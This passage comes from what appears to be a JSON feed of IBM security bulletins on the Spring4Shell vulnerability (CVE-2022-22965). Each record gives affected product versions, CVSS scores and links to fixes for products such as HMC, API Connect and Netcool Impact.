\"\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T23:09:44", "type": "ibm", "title": "Security Bulletin: IBM InfoSphere Information Server is affected by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-27T23:09:44", "id": "55BD84BAE8C7A14BA43B1D5F808B6528E4FBEF810015A85F798847837C477C2F", "href": "https://www.ibm.com/support/pages/node/6575577", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:32:36", "description": "## Summary\n\nHMC is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Cloud connector service if enabled will use only the spring, as in a client to make only the REST calls with IBM Cloud Mangement Console. The fix includes Spring 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nHMC V10.1.1010.0| V10.1.1010.0 and later \nHMC V9.2.950.0| V9.2.950.0 and later \n \n\n\n## Remediation/Fixes\n\nThe following fixes are available on IBM Fix Central at: <http://www-933.ibm.com/support/fixcentral/>\n\nProduct\n\n| \n\nVRMF\n\n| \n\nAPAR\n\n| \n\nRemediation/Fix \n \n---|---|---|--- \n \nPower HMC\n\n| \n\nV9.2.952.0 ppc\n\n| \n\nMB04331\n\n| \n\n[MH01925](<https://www.ibm.com/support/fixcentral/main/selectFixes?parent=powersysmgmntcouncil&product=ibm~hmc~9100HMCppc&release=V9R2&platform=All> \"MH01913\" ) \n \nPower HMC\n\n| \n\nV9.2.952.0 x86\n\n| \n\nMB04330\n\n| \n\n[MH01924](<https://www.ibm.com/support/fixcentral/main/selectFixes?parent=powersysmgmntcouncil&product=ibm~hmc~9100HMC&release=V9R2&platform=All> \"MH01912\" ) \n \nPower HMC\n\n| \n\nV10.1.1010.0 ppc\n\n| \n\nMB04335\n\n| \n\n[MF69724](<https://www.ibm.com/support/fixcentral/main/selectFixes?parent=powersysmgmntcouncil&product=ibm~hmc~9100HMCppc&release=V10R1&platform=All> \"\" ) \n \nPower HMC\n\n| \n\nV10.1.1010.0 x86\n\n| \n\nMB04334\n\n| \n\n[MF69722](<https://www.ibm.com/support/fixcentral/main/selectFixes?parent=powersysmgmntcouncil&product=ibm~hmc~vHMC&release=V10R1&platform=All> \"\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-01T07:22:34", "type": "ibm", "title": "Security Bulletin: HMC is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-06-01T07:22:34", "id": "3AAC421D0DF5831B3220FCCBA6EA78CC01A191BC68D1B4BF16F97C53C8358B64", "href": "https://www.ibm.com/support/pages/node/6591147", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:32:36", "description": "## Summary\n\nWatson Machine Learning Accelerator is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. WMLA use spring framework to manage java application's dependency injection, events, resources, i18n, validation, data binding, type conversion, SpEL, AOP. The fix includes Spring 5.3.19.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Machine Learning Accelerator| \n\n2.2.0;2.2.1;2.2.2;2.2.3 \n2.3.0;2.3.1;2.3.2;2.3.3;2.3.4;2.3.5;2.3.6;2.3.7;2.3.8 \n1.2.1;1.2.2;1.2.3 \n \n \n\n\n## Remediation/Fixes\n\n**1\\. For Watson Machine Learning Accelerator version 2.2.x**\n\nTo address the affected version, upgrade to IBM Watson Machine Learning Accelerator 2.2.4 by following the document <https://www.ibm.com/docs/en/cloud-paks/cp-data/3.5.0?topic=accelerator-upgrading-watson-machine-learning>\n\n**2\\. For Watson Machine Learning Accelerator version 2.3.x**\n\nTo address the affected version, upgrade to IBM Watson Machine Learning Accelerator 2.3.9 by following the document <https://www.ibm.com/docs/en/wmla/2.3?topic=installation-install-upgrade>\n\n**3\\. For Watson Machine Learning Accelerator version 1.2.3**\n\nTo address the affect version, install the interim fix 601147 from the following location: <https://www.ibm.com/eserver/support/fixes/> with fix id: dli-1.2.3-build601147-wmla \n\nNote: For the version 1.2.1,1.2.2, first upgrade the cluster to version 1.2.3 by following the document <https://www.ibm.com/docs/ro/wmla/1.2.3?topic=upgrading-wml-accelerator>, then install the interim fix 601147.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-01T02:33:07", "type": "ibm", "title": "Security Bulletin: Watson Machine Learning Accelerator is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-06-01T02:33:07", "id": "E9F0B13DD28C1AFA3EA944A83A0281284C2444069758D5085ED5787CB960A8C5", "href": "https://www.ibm.com/support/pages/node/6591113", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:32:39", "description": "## Summary\n\nIBM Security SOAR is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Access to the Spring Framework is through internal, trusted APIs only. The fix includes Spring version 5.2.20.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n**DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM\u00ae Security SOAR | \n\nIBM Security SOAR versions 26 - 44.1 \n \n## Remediation/Fixes\n\nIBM encourages customers to promptly update their systems.\n\nUsers must upgrade to v44.2.0 or higher of IBM SOAR in order to obtain a fix for this vulnerability. You can upgrade the platform and apply the security updates by following the instructions in the \"**Upgrade Procedure**\" section in the [IBM Documentation](<https://www.ibm.com/docs/en/rsoa-and-rp/42?topic=guide-upgrading-platform> \"IBM Documentation\" ).\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-01T00:13:20", "type": "ibm", "title": "Security Bulletin: IBM Security SOAR is affected but not classified as vulnerable to remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-06-01T00:13:20", "id": "2F810DF5129E61B7AECC07F3698A4E88FEDD4A1E7CA3A999FA93E04C4733C72C", "href": "https://www.ibm.com/support/pages/node/6571299", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:32:48", "description": "## Summary\n\nIBM Common Licensing is affected but not classified as vulnerable to a remote code execution in Spring Framework (220575, CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. In IBM Common Licensing Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19 and is Spring- webmvc dependent. The fix includes Spring 5.3.19.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** IBM X-Force ID: **220575 \n** DESCRIPTION: **Spring Framework could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization in the SerializableTypeWrapper class. By sending specially-crafted input, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [https://exchange.xforce.ibmcloud.com/vulnerabilities/220575 ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/220575>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Common Licensing| ART 8.1.6 \nIBM Common Licensing| ART 9.0 \nIBM Common Licensing| Agent 9.0 \n \n\n\n## Remediation/Fixes\n\nThe 220575,CVE-2022-22965 flaw lies in Spring Framework. Spring has provided update fixes (Spring Framework 5.2.20 & 5.3.18+). The advisory cautions that the vulnerability is \"general, and there may be other ways to exploit it.\" \nIBM strongly recommends addressing the Spring framework vulnerability now by applying the suggested fix that uses Spring Framework 5.3.19. \n\n \nApply the ART and Agent ifix from fix central :\n\n[IBM_LKS_Administration_And_Reporting_Tool_And_Agent_90_Spring_ART_LDAP_iFix_1](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FRational%2FRational+Common+Licensing&fixids=IBM_LKS_Administration_And_Reporting_Tool_And_Agent_90_Spring_ART_LDAP_iFix_1&source=SAR> \"IBM_LKS_Administration_And_Reporting_Tool_And_Agent_90_Spring_ART_LDAP_iFix_1\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-30T08:57:45", "type": "ibm", "title": "Security Bulletin:IBM Common Licensing is affected but not classified as vulnerable by a remote code execution in Spring Framework (220575,CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-30T08:57:45", "id": "81F73DF562970E5239B639CE59B471B9D34E39C4A5BDD496165656D76C34B09B", "href": "https://www.ibm.com/support/pages/node/6590823", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:35:02", "description": "## Abstract\n\nIs Sterling Order Management affected by Spring vulnerability CVE-2022-22965?\n\n## Content\n\nIBM is aware of a recently surfaced vulnerability [CVE-2022-22965](<https://nvd.nist.gov/vuln/detail/CVE-2022-22965>) and has evaluated whether any Sterling Order Management applications are affected. The following is a summary of our evaluation:\n\nComponent | \n\nSpring \nversion\n\nused\n\n| Impacted by \nCVE-2022-22965 | \n\nImmediate\n\nMitigation\n\nPlan\n\n| Latest Status \n---|---|---|---|--- \nSterling Order Management SaaS, On-prem and Certified Containers (including Store Engagement & Call Center) | Not used | No | N/A | Not vulnerable \n \nInventory Visibility\n\nMicroservice \n\n| Not used | No | N/A | Not vulnerable \n \nIntelligent Promising\n\nMicroservice\n\n| Not used | No | N/A | Not vulnerable \nOMS Data Exchange Service | Not used | No | N/A | Not vulnerable \n \nStore Inventory Management\n\nMicroservice\n\n| Not used | No | N/A | Not vulnerable \nOrder Hub | Not used | No | N/A | Not vulnerable \nSterling Fulfillment Optimizer | Not used | No | N/A | Not vulnerable \nConfigure, Price, Quote (CPQ): Omni-Configurator and Visual Modeler | Not used | No | N/A | Not vulnerable \nConfigure, Price, Quote (CPQ): Field Sales | Not used | No | N/A | Not vulnerable \n \n## Related Information \n\n[Spring Framework RCE, Early Announcement - spring.io](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>)\n\n[CVE-2022-22965 - National Vulnerability Database](<https://nvd.nist.gov/vuln/detail/CVE-2022-22965>)\n\n[CVE-2022-22965 - mitre.org](<https://vulners.com/cve/CVE-2022-22965>)\n\n[CVE-2022-22965: Spring Framework RCE via Data Binding on JDK 9+ - vmware.com](<https://tanzu.vmware.com/security/cve-2022-22965>)\n\n[{\"Type\":\"MASTER\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6PEW\",\"label\":\"Sterling Order Management\"},\"ARM Category\":[{\"code\":\"a8m0z000000cy00AAA\",\"label\":\"Orders\"}],\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-19T21:24:49", "type": "ibm", "title": "Security Bulletin: Sterling Order Management and Spring vulnerability CVE-2022-22965", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-19T21:24:49", "id": "EF2166DB5EE8BD87E1440D3823C327B8BCA46A3FD349720520FD40C591911F30", "href": "https://www.ibm.com/support/pages/node/6572485", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:33:48", "description": "## Summary\n\nIBM API Connect V10 is vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it meets all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. This Spring vulnerability only exists, if clients installed the optional API Connect V10 Application Test and Monitor function. The fix includes Spring-boot 2.6.6, Spring-core 5.3.18 and Spring-framework 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAPI Connect| API Connect V10.0.0.0 - V10.0.1.1 \n---|--- \n| \n| \n \n\n\n## Remediation/Fixes\n\nAffected Product| Addressed in VRMF| APAR| Remediation/First Fix \n---|---|---|--- \n \nIBM API Connect \n\nV10.0.0.0-V10.0.1.1\n\n| 10.0.1.**<X>**| | Please see links to various resources for a quick ref. \n\n10.0.1.6-ifix1 \nRelease Announce notes: <https://www.ibm.com/support/pages/node/6571315> \nIBM Docs: <https://www.ibm.com/docs/en/api-connect/10.0.1.x?topic=aco-whats-new-in-latest-release-version-10016-ifix1-eus> \nFix Central: [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=10.0.1.6&platform=All&function=all](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=10.0.1.6&platform=All&function=all>)\n\n10.0.4.0-ifix3 \nRelease Announce notes: <https://www.ibm.com/support/pages/node/6571313> \nIBM Docs: <https://www.ibm.com/docs/en/api-connect/10.0.x?topic=aco-whats-new-in-latest-release-version-10040-ifix3> \nFix Central: [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=10.0.4.0&platform=All&function=all](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=10.0.4.0&platform=All&function=all>) (Filter fix details: 10.0.4.0-ifix3 ) \n \n| | | \n| | | \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-05T16:59:52", "type": "ibm", "title": "Security Bulletin: API Connect V10 is vulnerable to a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-05T16:59:52", "id": "F243281320AFD7E2710EDC7B3D2DE73901C6546A063CD6DB1074893EA50F7F8E", "href": "https://www.ibm.com/support/pages/node/6583065", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:30:46", "description": "## Summary\n\nIBM Tivoli Netcool Impact is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965).Spring is shipped as part of ActiveMQ package but is not used by the product. The fix removes Spring from the product.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Netcool Impact| 7.1.0 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading: \n\nProduct| VRMF| APAR| Remediation \n---|---|---|--- \nIBM Tivoli Netcool Impact 7.1.0| 7.1.0.26| IJ39753| Upgrade to [IBM Tivoli Netcool Impact 7.1.0 FP26](<https://www.ibm.com/support/pages/node/6587919> \"IBM Tivoli Netcool Impact 7.1.0 FP26\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-05T14:00:50", "type": "ibm", "title": "Security Bulletin: IBM Tivoli Netcool Impact is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-07-05T14:00:50", "id": "73A0E3B8972417A5C5268EE0E3803B9B8C2E0463C9659C6C828573AC1D00D1AB", "href": "https://www.ibm.com/support/pages/node/6601301", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:23:12", "description": "## Summary\n\nIBM Case Manager is affected but not classified as vulnerable to a remote code execution in Spring Framework [CVE-2022-22965]. To be 